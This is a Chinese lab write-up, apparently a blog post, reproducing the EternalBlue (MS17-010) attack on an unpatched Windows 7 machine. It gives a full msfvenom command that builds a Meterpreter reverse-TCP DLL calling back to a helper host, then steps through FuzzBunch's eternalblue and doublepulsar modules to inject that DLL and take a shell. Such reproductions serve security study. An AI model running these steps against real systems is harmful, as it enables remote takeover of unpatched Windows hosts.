zoukankan      html  css  js  c++  java
  • 永恒之蓝漏洞利用复现

    一、环境搭建:

    IP地址 系统信息 备注 角色
    192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机
    192.168.0.105 win7旗舰版 需安装python2.6.6&pywin32 攻击机
    192.168.0.245 kali linux 2.0 生成reverse shell的dll文件 辅助机

    二、攻击流程:

      攻击流程图解:

      

      1.在kali linux中利用metasploit生成用于建立反向链接的dll文件

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > reverse.dll

      2.打开metasploit

      

      3.建立监听

      

      4.在Windows 7下,运行fb.py工具

      

      5.指定攻击目标

      

      6.指定攻击目标后,输入:use eternalblue,使用永恒之蓝漏洞

      7.一路确认输入的信息,知道选择攻击工具,选择fb模块

      

      8.再次确认攻击目标,之后输入:use doublepulsar

      9.选择要攻击的服务

      

      10.一路按确定键,直到进入选择执行动作这一步骤

      

      11.在选择攻击动作之前将步骤1中生成的reverse.dll文件放置在攻击机的c盘下

      12.选择2,将步骤1中生成的reverse.dll文件注入到靶机

      13.成功注入

      

      此时,攻击机获得靶机根权限,可以在攻击机上执行靶机的shell 命令,查看靶机文件。

  • 相关阅读:
    接口和实现接口的类
    类的封装
    实验六:类的封装
    实验五:任意输入10个int类型数据,排序输出,再找出素数
    实验四:采用一维数组输出等腰三角形的杨辉三角
    2017-12-31 小组工作记录
    2017-12-30 小组工作记录
    2017-12-29 小组工作记录
    2017-12-24 小组工作记录
    2017-12-21 小组工作记录
  • 原文地址:https://www.cnblogs.com/zhang293/p/7346859.html
Copyright © 2011-2022 走看看